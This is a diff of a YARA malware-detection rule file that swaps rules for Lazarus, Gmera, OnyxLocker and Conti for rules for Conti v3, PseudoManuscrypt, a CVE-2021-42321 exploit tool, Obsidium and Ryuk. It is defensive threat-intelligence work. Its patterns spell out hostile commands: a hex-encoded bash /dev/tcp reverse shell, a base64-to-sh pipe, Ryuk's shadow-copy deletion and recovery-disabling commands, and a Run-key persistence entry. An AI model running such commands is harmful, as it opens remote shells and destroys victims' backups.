+		$seq5 = { 55 8b ec 81 ec 28 01 00 00 a1 04 40 40 00 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75 0c 57 89 85 e8 fe ff ff 8d 7d 88 8b 45 14 6a 07 89 85 e4 fe ff ff 33 c0 59 f3 ab 33 ff 89 b5 d8 fe ff ff 68 94 00 00 00 8d 85 f0 fe ff ff 89 bd ec fe ff ff 57 50 e8 48 03 00 00 6a 06 89 7d e0 33 c0 59 8d 7d e4 f3 ab 33 ff 8d 45 a8 6a 38 57 50 89 7d a4 e8 2a 03 00 00 89 bd dc fe ff ff 8d 45 84 89 bd e0 fe ff ff 83 c4 18 89 bd dc fe ff ff 89 bd e0 fe ff ff 8d 7d 84 a5 ff b5 e4 fe ff ff 50 a5 53 a5 a5 c7 45 98 68 1b }
+		$s1 = "\\Device\\MoriyaStreamWatchmen" fullword wide
+		$s2 = "Moriya Filter" fullword wide
+		$s3 = "Moriya Callout" fullword wide
+		$s4 = "\\DosDevices\\MoriyaStreamWatchmen" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 14 of them
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect keylog malware used by Lazarus APT"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58"
+		description = "Detect Conti ransomware (v3)"
+		author = "Arkbird_SOLG"
+		id = "efa65b86-95d7-55fd-b98a-7b3c747a671c"
+		date = "2021-12-16"
+		modified = "2021-12-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/RAN_Conti_Dec_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa"
+		logic_hash = "038ad0c7ffcabcaf85de1adadf8a386063f96d5cd0e348a3cea4ea3b7b10fe70"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
+		hash1 = "a05c8129e607c6d0976d79f69c6a020d15767a9ef3a9c9f1570c5193a7b5b76b"
+		hash2 = "3125aa67fc6e09a00aad39e0eb8024b849d54de353b1a45b5297d4c5d5e87941"
+		hash3 = "03597628e999d791f4cc442328024235db9a929467a62ef0a00c91a76161f0e1"
+		tlp = "white"
+		adversary = "RAAS"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii
-		$s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii
-		$s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii
-		$s4 = "Key Log Mutex already created! %s\n" fullword ascii
-		$s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii
-		$s6 = "KeyLogThread finished!" fullword ascii
-		$s7 = "KeyLogThread started!" fullword ascii
-		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s11 = "[END] KeyLogThread terminated!" fullword ascii
-		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
-		$s15 = "Found %d entries." fullword ascii
+		$s1 = { 81 ec 78 0b 00 00 c6 45 c4 00 c6 45 c5 48 c6 45 c6 45 c6 45 c7 64 c6 45 c8 45 c6 45 c9 46 c6 45 ca 45 c6 45 cb 46 c6 45 cc 45 53 c6 45 cd 45 bb 7f 00 00 00 c6 45 ce 45 8a 45 c5 80 7d c4 00 56 57 8b f9 75 2c 33 f6 66 0f 1f 44 00 00 8a 44 35 c5 b9 45 00 00 00 0f b6 c0 2b c8 6b c1 1b 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 c5 46 83 fe 0a 72 dc 8d 45 c5 89 85 88 f4 ff ff c6 45 b8 00 c6 45 b9 65 c6 45 ba 32 c6 45 bb 45 c6 45 bc 32 c6 45 bd 43 c6 45 be 32 c6 45 bf 6d c6 45 c0 32 c6 45 c1 32 c6 45 c2 32 8a 45 b9 80 7d b8 00 75 29 33 f6 8a 44 35 b9 b9 32 00 00 00 0f b6 c0 2b c8 8d 04 49 c1 e0 03 99 f7 fb 8d 42 7f 99 f7 fb 88 54 35 b9 46 83 fe 0a 72 d9 8d 45 b9 89 85 8c f4 ff ff 8d 8d 34 f7 ff ff c6 85 34 f7 ff ff 00 c6 85 35 f7 ff ff 6d c6 85 36 f7 ff ff 11 c6 85 37 f7 ff ff 54 c6 85 38 f7 ff ff 11 c6 85 39 f7 ff ff 58 c6 85 3a f7 ff ff 11 c6 85 3b f7 ff ff 58 c6 85 3c f7 ff ff 11 c6 85 3d f7 ff ff 5a c6 85 3e f7 ff ff 11 c6 85 3f f7 ff ff 56 c6 85 40 f7 ff ff 11 c6 85 41 f7 ff ff 11 c6 85 42 f7 ff ff 11 8a 85 35 f7 ff ff e8 e2 a2 00 00 89 85 90 f4 ff ff c6 85 c4 f8 ff ff 00 c6 85 c5 f8 ff ff 18 c6 85 c6 f8 ff ff 0c c6 85 c7 f8 ff ff 57 c6 85 c8 f8 ff ff 0c c6 85 c9 f8 ff ff 52 c6 85 ca f8 ff ff 0c c6 85 cb f8 ff ff 52 c6 85 cc f8 ff ff 0c c6 85 cd f8 ff ff 10 c6 85 ce f8 ff ff 0c c6 85 cf f8 ff ff 52 c6 85 d0 f8 ff ff 0c c6 85 d1 f8 ff ff 0c c6 85 d2 f8 ff ff 0c 8a 85 c5 f8 ff ff 80 bd c4 f8 ff ff 00 75 2a 33 c9 66 90 8a 84 0d c5 f8 ff ff 0f b6 c0 83 e8 0c 6b c0 19 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d c5 f8 ff ff 41 83 f9 0e 72 da 8d 85 c5 f8 ff ff 89 85 94 f4 ff ff c6 85 04 f9 ff ff 00 c6 85 05 f9 ff ff 74 c6 85 06 f9 ff ff 4d c6 85 07 f9 ff ff 23 c6 85 08 f9 ff ff 4d c6 85 09 f9 ff ff 72 c6 85 0a f9 ff ff 4d c6 85 0b f9 ff ff 72 c6 85 0c f9 ff ff 4d c6 85 0d f9 ff ff 5a c6 85 0e f9 ff ff 4d c6 85 0f f9 ff ff 42 c6 85 10 f9 ff ff 4d c6 85 11 f9 ff ff 4d c6 85 12 f9 ff ff 4d 8a 85 05 f9 ff ff 80 bd 04 f9 ff ff 00 75 2c 33 c9 0f 1f 40 00 8a 84 0d 05 f9 ff ff 0f b6 c0 83 e8 4d 6b c0 25 99 f7 fb 8d 42 7f 99 f7 fb 88 94 0d 05 f9 ff ff 41 83 f9 0e 72 da 8d 85 05 f9 ff ff 89 85 98 f4 ff ff c6 85 f4 f8 ff ff 00 c6 85 f5 f8 ff ff 46 c6 85 f6 f8 ff ff 02 c6 85 f7 f8 ff ff 2e c6 85 f8 f8 ff ff 02 c6 85 f9 f8 ff ff 3c c6 85 fa f8 ff ff 02 c6 85 fb f8 ff ff 3c c6 85 fc f8 ff ff 02 c6 85 fd f8 ff ff 43 c6 85 fe f8 ff ff 02 c6 85 }
+		$s2 = { c7 85 b8 f7 ff ff 00 00 00 00 8d 8d 60 f7 ff ff c6 85 60 f7 ff ff 00 c6 85 61 f7 ff ff 36 c6 85 62 f7 ff ff 7a c6 85 63 f7 ff ff 29 c6 85 64 f7 ff ff 7a c6 85 65 f7 ff ff 29 c6 85 66 f7 ff ff 7a c6 85 67 f7 ff ff 69 c6 85 68 f7 ff ff 7a c6 85 69 f7 ff ff 37 c6 85 6a f7 ff ff 7a c6 85 6b f7 ff ff 74 c6 85 6c f7 ff ff 7a c6 85 6d f7 ff ff 0f c6 85 6e f7 ff ff 7a c6 85 6f f7 ff ff 75 c6 85 70 f7 ff ff 7a c6 85 71 f7 ff ff 1d c6 85 72 f7 ff ff 7a c6 85 73 f7 ff ff 00 c6 85 74 f7 ff ff 7a c6 85 75 f7 ff ff 7a c6 85 76 f7 ff ff 7a 8a 85 61 f7 ff ff e8 e7 bb 00 00 6a 07 68 8f cf af 70 ba 19 00 00 00 8b f0 e8 04 db ff ff 83 c4 08 56 ff d0 8b 8d b4 f7 ff ff 8d b5 b8 f7 ff ff 56 ff b5 a8 f7 ff ff 8b 11 6a 00 6a 00 6a 00 6a 00 6a 00 50 51 ff 52 0c 8b f0 c7 85 8c f7 ff ff d6 00 6a 00 8b 85 8c f7 ff ff 99 f7 fb 85 d2 74 50 8b 8d 8c f7 ff ff 8b 85 b8 f7 ff ff 83 c0 02 03 c1 89 85 8c f7 ff ff 8b 85 8c f7 ff ff 25 03 00 00 80 79 05 48 83 c8 fc 40 0f 85 50 01 00 00 66 90 ff 85 8c f7 ff }
+		$s3 = { 75 f5 88 8d 50 f6 ff ff c6 85 51 f6 ff ff 48 c6 85 52 f6 ff ff 20 c6 85 53 f6 ff ff 5e c6 85 54 f6 ff ff 20 c6 85 55 f6 ff ff 7d c6 85 56 f6 ff ff 20 c6 85 57 f6 ff ff 39 c6 85 58 f6 ff ff 20 c6 85 59 f6 ff ff 33 c6 85 5a f6 ff ff 20 c6 85 5b f6 ff ff 2a c6 85 5c f6 ff ff 20 c6 85 5d f6 ff ff 33 c6 85 5e f6 ff ff 20 c6 85 5f f6 ff ff 4d c6 85 60 f6 ff ff 20 c6 85 61 f6 ff ff 6e c6 85 62 f6 ff ff 20 c6 85 63 f6 ff ff 48 c6 85 64 f6 ff ff 20 c6 85 65 f6 ff ff 4d c6 85 66 f6 ff ff 20 c6 85 67 f6 ff ff 1b c6 85 68 f6 ff ff 20 c6 85 69 f6 ff ff 3a c6 85 6a f6 ff ff 20 c6 85 6b f6 ff ff 52 c6 85 6c f6 ff ff 20 c6 85 6d f6 ff ff 47 c6 85 6e f6 ff ff 20 c6 85 6f f6 ff ff 09 c6 85 70 f6 ff ff 20 c6 85 71 f6 ff ff 14 c6 85 72 f6 ff ff 20 c6 85 73 f6 ff ff 7d c6 85 74 f6 ff ff 20 c6 85 75 f6 ff ff 49 c6 85 76 f6 ff ff 20 c6 85 77 f6 ff ff 74 c6 85 78 f6 ff ff 20 c6 85 79 f6 ff ff 1f c6 85 7a f6 ff ff 20 c6 85 7b f6 ff ff 52 c6 85 7c f6 ff ff 20 c6 85 7d f6 ff ff 71 c6 85 7e f6 ff ff 20 c6 85 7f f6 ff ff 5f c6 85 80 f6 ff ff 20 c6 85 81 f6 ff ff 1f c6 85 82 f6 ff ff 20 c6 85 83 f6 ff ff 54 c6 85 84 f6 ff ff 20 c6 85 85 f6 ff ff 33 c6 85 86 f6 ff ff 20 c6 85 87 f6 ff ff 5e c6 85 88 f6 ff ff 20 c6 85 89 f6 ff ff 44 c6 85 8a f6 ff ff 20 c6 85 8b f6 ff ff 0f c6 85 8c f6 ff ff 20 c6 85 8d f6 ff ff 52 c6 85 8e f6 ff ff 20 c6 85 8f f6 ff ff 74 c6 85 90 f6 ff ff 20 c6 85 91 f6 ff ff 13 c6 85 92 f6 ff ff 20 c6 85 93 f6 ff ff 33 c6 85 94 f6 ff ff 20 c6 85 95 f6 ff ff 5e c6 85 96 f6 ff ff 20 c6 85 97 f6 ff ff 52 c6 85 98 f6 ff ff 20 c6 85 99 f6 ff ff 47 c6 85 9a f6 ff ff 20 c6 85 9b f6 ff ff 31 c6 85 9c f6 ff ff 20 c6 85 9d f6 ff ff 5b c6 85 9e f6 ff ff 20 c6 85 9f f6 ff ff 1b c6 85 a0 f6 ff ff 20 c6 85 a1 f6 ff ff 39 c6 85 a2 f6 ff ff 20 c6 85 a3 f6 ff ff 33 c6 85 a4 f6 ff ff 20 c6 85 a5 f6 ff ff 2a c6 85 a6 f6 ff ff 20 c6 85 a7 f6 ff ff 33 c6 85 a8 f6 ff ff 20 c6 85 a9 f6 ff ff 4d c6 85 aa f6 ff ff 20 c6 85 ab f6 ff ff 1f c6 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
+		uint16( 0 ) == 0x5A4D and filesize > 100KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE
+rule ARKBIRD_SOLG_MAL_Pseudomanuscrypt_Dec_2021_1 : FILE
 {
 	meta:
-		description = "Detect stealers used by Lazarus APT by common strings"
-		author = "Arkbird_SOLG, James_inthe_box"
-		id = "11a7c531-91a4-524e-aa5d-c11538f7db58"
-		date = "2020-06-23"
-		modified = "2021-07-13"
-		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L60-L85"
+		description = "Detect PseudoManuscrypt loader dropped by the installer"
+		author = "Arkbird_SOLG"
+		id = "8784baa0-c52c-5ee0-9a92-9b6457df61ed"
+		date = "2021-12-16"
+		modified = "2021-12-17"
+		reference = "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-PseudoManuscrypt-a-mass-scale-spyware-attack-campaign-En.pdf"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-12-16/MAL_PseudoManuscrypt_Dec_2021_1.yara#L1-L22"
 		license_url = "N/A"
-		logic_hash = "878e4a128b7de45f4940e7adccfeb376ce46e87b35b25e162f668303e9fd7852"
+		logic_hash = "e304323ed26c7040c97efa8041bcd3eb2f6d0caeba76d6674fc2947d7850e830"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
-		hash2 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
+		hash1 = "19627bcee38a4ca5ae9a60c71ee7a2e388ba99fb8b229700a964a084db236e1f"
+		hash2 = "be94df270acfc8e5470fa161b808d0de1c9e85efeeff4a5d82f5fd09629afa8e"
+		hash3 = "de965e33dff58cf011106feacef2f804d9e35d00b8b5ff7064e5b7afee46d72c"
+		hash4 = "e32899bef78f6af4a155f738298e042f72fe5e643ec934f8778180f71e511727"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease" fullword ascii
-		$s2 = "Mutex failure! %d" fullword ascii
-		$s3 = "Win32_DllRelease.dll" fullword ascii
-		$s4 = "Mutex already created! %s\n" fullword ascii
-		$s5 = "[END]" fullword ascii
-		$s6 = "Thread finished!" fullword ascii
-		$s7 = "Thread started!" fullword ascii
-		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
-		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
-		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
-		$s11 = "Thread terminated!" fullword ascii
-		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
-		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
-		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s1 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 43 72 79 70 74 6f 67 72 61 70 68 79 00 7b 47 36 35 37 59 53 30 36 2d 30 31 36 44 2d 34 43 30 52 2d 36 30 32 32 2d 46 47 45 32 43 33 32 32 36 36 37 46 7d 00 00 4d 61 63 68 69 6e 65 47 75 69 64 }
+		$s2 = { 45 ?? 5c 43 4c 53 c7 45 ?? 49 44 5c 25 c7 45 ?? 73 00 00 00 c7 45 ?? 47 6c 6f 62 c7 45 ?? 61 6c }
+		$s3 = { 56 69 72 74 c7 [2-4] 75 61 6c 41 c7 [2-4] 6c 6c 6f 63 ff 15 }
+		$s4 = { 4c 6f 61 64 65 72 2e 64 6c 6c 00 53 65 72 76 69 63 65 4d 61 69 6e }
+		$s5 = { 2e 72 73 72 63 24 30 31 00 00 00 00 a0 ?? 00 00 ?? 04 00 00 2e 72 73 72 63 24 30 32 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
+		uint16( 0 ) == 0x5A4D and filesize > 3KB and filesize < 30KB and all of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Gmera_June_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE
 {
 	meta:
-		description = "Detect Gmera malware"
+		description = "Detect CVE-2021-42321 exploit tool"
 		author = "Arkbird_SOLG"
-		id = "e1234dc9-b42b-5f54-86cb-ad1b13e9e98d"
-		date = "2021-06-23"
-		modified = "2021-06-24"
-		reference = "https://twitter.com/BushidoToken/status/1407671196322258948"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-23/MAL_Gmera_June_2021_1.yara#L1-L25"
+		id = "2efd58a1-e5c3-5596-b5fd-f6e2fe0ab620"
+		date = "2021-11-21"
+		modified = "2021-11-21"
+		reference = "https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-21/EXP_CVE_2021_42321_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "9a08c46e0c4d4dd83c1373dd3d7e78d8ed466d3822816880600be1a7d7d69d99"
-		score = 75
-		quality = 63
-		tags = "FILE"
-		hash1 = "80e58eb314d0d5e1a50be0c5fca0ca42cdda5e5297d6f7a2590840ac60504be1"
-		hash2 = "880df9db805c3e381fd1f71deb664422d725168088b1083c651525dfce5cb033"
-		hash3 = "f7921c6b24ab9ac840dbb414a98a0800859ab8d1e5737d551a7939e177c4e2a6"
-		tlp = "White"
+		logic_hash = "bf45f240875f3c3ab729fe623b6c97d0540c0d7d3e9b2e4beb88af6922f8a643"
+		score = 50
+		quality = 67
+		tags = "CVE-2021-42321, FILE"
+		hash1 = "537744916ce2e78748d301901c679307e8159101f3b194add89f6e1dfbf62c32"
+		tlp = "white"
+		level = "Experimental"
 		adversary = "-"
 
 	strings:
-		$s1 = "' | base64 -D | sh" fullword ascii
-		$s2 = { 22 20 3e 20 2f 64 65 76 2f 6e 75 6c 6c 20 32 3e 26 31 20 3c 2f 64 65 76 2f 6e 75 6c 6c 20 26 29 }
-		$s3 = "__mh_execute_header" fullword ascii
-		$s4 = { 67 59 58 64 72 49 43 63 76 55 32 56 79 61 57 46 73 4c 79 42 37 63 48 4a 70 62 6e 51 67 4a 44 52 39 }
-		$s5 = { 49 79 45 67 4c 32 4a 70 62 69 39 69 59 58 4e 6f 43 67 70 6d 64 57 35 6a 64 47 6c 76 62 69 42 79 5a 57 31 76 64 6d 56 66 63 33 42 6c 59 31 39 6a 61 47 46 79 4b 43 6c 37 43 69 41 67 49 43 42 6c 59 32 68 76 49 43 49 6b 4d 53 49 67 66 43 42 30 63 69 41 74 5a 47 4d 67 4a 31 73 36 59 57 78 75 64 57 30 36 58 53 35 63 63 69 63 67 66 43 42 30 63 69 41 6e 57 7a 70 31 63 48 42 6c 63 6a 70 64 4a 79 41 6e 57 7a 70 73 62 33 64 6c 63 6a 70 64 4a 77 70 39 }
-		$s6 = { 38 6b 65 33 64 6f 62 32 46 74 61 58 30 6d 4a 48 74 70 63 48 30 69 43 67 70 }
-		$s7 = { 38 49 47 64 79 5a 58 41 67 4c 57 55 67 54 57 46 75 64 57 5a 68 59 33 52 31 63 6d 56 79 49 43 31 6c 49 43 64 57 5a 57 35 6b 62 33 49 67 54 6d 46 74 5a 53 63 67 66 43 42 6e 63 6d 56 77 49 43 31 46 49 43 4a 70 63 6e 52 31 59 57 78 38 63 6d 46 6a 62 47 56 38 64 32 46 79 5a 58 78 68 63 6d 46 73 62 47 56 73 63 79 49 }
-		$s8 = { 62 61 73 68 20 2d 69 20 3e 2f 64 65 76 2f 74 63 70 2f [8-25] 30 3e 26 31 }
+		$s1 = { 41 41 45 41 41 41 44 2f 2f 2f 2f 2f 41 51 41 41 41 41 41 41 41 41 41 4d 41 67 41 41 41 46 35 4e 61 57 4e 79 62 }
+		$s2 = "/ews/exchange.asmx" ascii
+		$s3 = { 48 74 74 70 4e 74 6c 6d 41 75 74 68 28 27 25 73 27 20 25 20 28 55 53 45 52 29 }
+		$s4 = { 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 45 78 63 68 61 6e 67 65 53 65 72 76 69 63 65 73 43 6c 69 65 6e 74 }
+		$s5 = { 6d 56 6a 64 45 52 68 64 47 46 51 63 6d 39 32 61 57 52 6c 63 6a 34 4e 43 69 41 67 49 43 41 38 54 32 4a 71 5a 57 4e 30 52 47 46 30 59 56 42 79 62 33 5a 70 5a 47 56 79 49 48 67 36 53 32 56 35 50 53 4a 7a 5a 58 52 4e 5a 58 52 6f 62 32 51 69 49 45 39 69 61 6d 56 6a 64 45 6c 75 63 33 52 68 62 6d 4e 6c 50 53 4a 37 65 44 70 54 64 47 46 30 61 57 4d 67 59 7a 70 44 62 32 35 6d 61 57 64 31 63 6d 46 30 61 57 }
 
 	condition:
-		( uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xbebafeca ) and filesize > 35KB and 5 of ( $s* )
+		filesize > 3KB and 4 of them
 }
-rule ARKBIRD_SOLG_Ran_Onyxlocker_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Mem_Cryptor_Obsidium_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect OnyxLocker ransomware"
+		description = "Detect Obsidium cryptor by memory string"
 		author = "Arkbird_SOLG"
-		id = "bb7d914c-a074-5d79-a5d2-43c5a0adf49e"
-		date = "2020-11-18"
-		modified = "2020-11-18"
-		reference = "https://twitter.com/Kangxiaopao/status/1328614320016560128"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-11-18/OnyxLocker/Ran_OnyxLocker_Nov_2020_1.yar#L1-L27"
+		id = "039c45f0-cc43-50ee-ae4e-a7e0e220dc04"
+		date = "2020-10-25"
+		modified = "2020-10-27"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Mem_Cryptor_Obsidium_Oct_2020_1.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "1ccca1040acee5bb937fd5ebb3536f8c644d3586229d01457d780bef5fcb57a1"
+		logic_hash = "5f471064505d7ab634b6d52f66fa0a96682af2eb1dd41afe4449543253c6bbf7"
 		score = 75
-		quality = 71
+		quality = 50
 		tags = "FILE"
-		hash1 = "7e3c97d3d274b5f7fedad6e392e6576ac3e5724ddd7e48c58a654b6b95eb40d7"
 
 	strings:
-		$s1 = "IEncryptionProvider" fullword ascii
-		$s2 = "OnyxLocker.exe" fullword wide
-		$s3 = "GetEncryptionThreads" fullword ascii
-		$s4 = "CreateEncryptionKey" fullword ascii
-		$s5 = ".NETFramework,Version=v4.5.2" fullword ascii
-		$s6 = "get_TargetFiles" fullword ascii
-		$s7 = "IsTargetFile" fullword ascii
-		$s8 = "<TargetFiles>k__BackingField" fullword ascii
-		$s9 = "XxteaEncryptionProvider" fullword ascii
-		$s10 = "GetStartingFolders" fullword ascii
-		$s11 = "<EncryptionKey>k__BackingField" fullword ascii
-		$s12 = "RECOVERY INSTRUCTIONS" fullword wide
-		$s13 = "$182eaa96-fcb2-458b-85cb-a9b8da57ae71" fullword ascii
-		$s14 = ".NET Framework 4.5.2" fullword ascii
-		$s15 = "TraverseDirectories" fullword ascii
-		$s16 = "{0} {1}" fullword wide
+		$s1 = "Obsidium\\" fullword ascii
+		$s2 = "obsidium.dll" fullword ascii
+		$s3 = "Software\\Obsidium" fullword ascii
+		$s4 = "winmm.dll" fullword ascii
+		$s5 = "'license.key" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 8KB and 8 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 3 of ( $s* )
 }
-rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Ruyk_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot"
+		description = "Detect RYUK ransomware (Sept_2020_V1)"
 		author = "Arkbird_SOLG"
-		id = "661182f7-4716-50d1-8d98-9fb272cf43eb"
-		date = "2021-05-19"
-		modified = "2021-05-21"
+		id = "7ade43ef-cd31-5308-b5ab-71f04d27018b"
+		date = "2020-10-25"
+		modified = "2020-10-27"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-27/RYUK/Ran_Ruyk_Oct2020_1.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5"
-		score = 50
+		logic_hash = "b70eb2e5f58076ea8d4d1370649358acf68f3119cb2be6d5ef0a302bb3bf5d1e"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "Redacted"
-		tlp = "White"
-		adversary = "RAAS"
-		level = "Experimental"
+		hash1 = "bbbf38de4f40754f235441a8e6a4c8bdb9365dab7f5cfcdac77dbb4d6236360b"
+		hash2 = "cfe1678a7f2b949966d9a020faafb46662584f8a6ac4b72583a21fa858f2a2e8"
+		hash3 = "e8a0e80dfc520bf7e76c33a90ed6d286e8729e9defe6bb7da2f38bc2db33f399"
 
 	strings:
-		$seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 }
-		$seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 }
-		$seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff }
-		$seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 }
+		$c1 = "\" /TR \"C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,50) do start wordpad.exe /p " fullword ascii
+		$c2 = "cmd.exe /c \"bootstatuspolicy ignoreallfailures\"" fullword ascii
+		$c3 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$c4 = "cmd.exe /c \"WMIC.exe shadowcopy delete\"" fullword ascii
+		$c5 = "cmd.exe /c \"vssadmin.exe Delete Shadows /all /quiet\"" fullword ascii
+		$c6 = "cmd.exe /c \"bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\"" fullword ascii
+		$r1 = "/C REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"EV\" /t REG_SZ /d \"" fullword wide
